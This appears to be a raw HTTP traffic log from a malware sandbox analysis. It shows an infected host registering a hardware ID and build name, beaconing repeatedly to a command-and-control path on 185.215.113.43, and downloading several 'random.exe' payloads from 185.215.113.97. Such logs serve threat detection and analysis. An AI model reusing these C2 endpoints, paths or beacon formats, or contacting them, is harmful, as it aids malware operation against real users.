Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJDHJEGHJKECBGCFHHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 38 44 44 33 37 31 33 30 31 38 30 31 31 32 38 30 35 36 36 34 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6b 69 72 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 2d 2d 0d 0a Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="hwid"18DD371301801128056648------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="build"kira------KFHJJDHJEGHJKECBGCFH--
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /files/Cyber_Yoda/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 36 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062161001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/asjduwgsgausi/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 36 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062162001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/sawdu5t/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 36 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062163001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/c0dxnfz/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 36 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062164001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: GET /files/sunnywebZ/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 36 32 31 36 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1062165001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 31 32 42 37 35 42 30 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7AB12B75B05C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
